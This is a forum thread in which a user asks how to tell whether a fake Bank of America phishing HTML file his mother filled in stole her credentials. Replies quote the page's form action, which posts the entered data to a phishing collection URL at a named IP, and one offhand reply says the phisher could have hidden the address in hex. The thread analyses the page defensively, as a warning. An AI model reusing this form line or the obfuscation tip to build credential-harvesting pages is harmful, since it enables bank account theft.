Jump to content
Please Use CODE Tags

Save text entries into a file with HTML

1823alex
By 1823alex
in Programming
 Share
Posted

My Mom just got an email from Bank of America saying she had some irregular activity on her account, I figured out it was a fake Bank of America email but she still entered some info into a fake HTML file named IrregularActivity.html she didn't enter everything in, but she did try to login with her credentials etc. So I'm thinking that it possibly saved whatever was entered into the document in a secret file somewhere, but I don't know how to check, I looked through, the HTML file and found nothing with C: in it, or any folders at all, but did find some random webpage that has an actual IP as it's URL, and it goes to some Hollywood County of North Carolina, I live in Chicago by the way. So any tips on what I should be looking for to find out if it did save credentials into a file somewhere hidden on the computer, or send them off somewhere. I'll upload the HTML file in a little bit.

Here's the link to it on MediaFire, you can just view it without downloading if you'd like. http://www.mediafire.com/view/62o14o51xtm9i44/IrregularActivityFile.html

Gaming Rig - Excalibur - CPU: i5 6600k @ 4.1GHz, CPU Cooler: Hyper 212 Evo, Mobo: MSI Gaming M3 RAM: 16GB Corsair @2400MHz, GPU: EVGA 1060, Case: NZXT Phantom Full Tower (Red)

My Virtualization Server - Dell R710: 2x X5570s @ 2.93GHz with 32GB DDR3 RAM [Web Server, OSX, Plex, Reverse Proxy]

I love computers, gaming, coding, and photography! Be sure to quote me so I can respond to your post!

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

I'm not downloading anything, could you paste the file in pastebin?

 

EDIT: Never mind :P 

[CPU: AMD FX-6100 @3.3GHz ] [MoBo: Asrock 970 Extreme4] [GPU: Gigabyte 770 OC ] [RAM: 8GB] [sSD: 64gb for OS] [PSU: 550Watt Be Quiet!] [HDD: 1TB] [CPU cooler: Be Quiet! Shadow Rock Pro Sr1]  -Did i solve your question/problem? Please click 'Marked Solved'-

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

It sent data to this IP address.

 

199.127.226.180 

 

action="http://myalerts.pw/site/sopp.php" method="POST" onsubmit="return validateForm()" target="myiframe">

 

 

that POST request most likely has any data that you put in the fields

 

heres the data center that the VPS this crap is hosted on. http://www.tocici.com/report that IP as malicious.

PEWDIEPIE DONT CROSS THAT BRIDGE

 

 

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
  • Author

It sent data to this IP address.

 

199.127.226.180 

Which links to this: http://sedoparking.com/en/

Any ideas on what it's doing at all? I tried to enter the letter 'g' into every field and it worked, than it took me to the official or at least what I think is the official Bank of America website.

EDIT: Is it trying to send fake traffic to one of those Sedo domain parking things in order to get money, based on what Sedo Parking pays people for?

Gaming Rig - Excalibur - CPU: i5 6600k @ 4.1GHz, CPU Cooler: Hyper 212 Evo, Mobo: MSI Gaming M3 RAM: 16GB Corsair @2400MHz, GPU: EVGA 1060, Case: NZXT Phantom Full Tower (Red)

My Virtualization Server - Dell R710: 2x X5570s @ 2.93GHz with 32GB DDR3 RAM [Web Server, OSX, Plex, Reverse Proxy]

I love computers, gaming, coding, and photography! Be sure to quote me so I can respond to your post!

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

Which links to this: http://sedoparking.com/en/

Any ideas on what it's doing at all? I tried to enter the letter 'g' into every field and it worked, than it took me to the official or at least what I think is the official Bank of America website.

EDIT: Is it trying to send fake traffic to one of those Sedo domain parking things in order to get money, based on what Sedo Parking pays people for?

its a skid looking crap phishing page.

 

if he was smart he would put the ip and packet method in hexidecial

PEWDIEPIE DONT CROSS THAT BRIDGE

 

 

Link to comment
Share on other sites
Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing Programming

×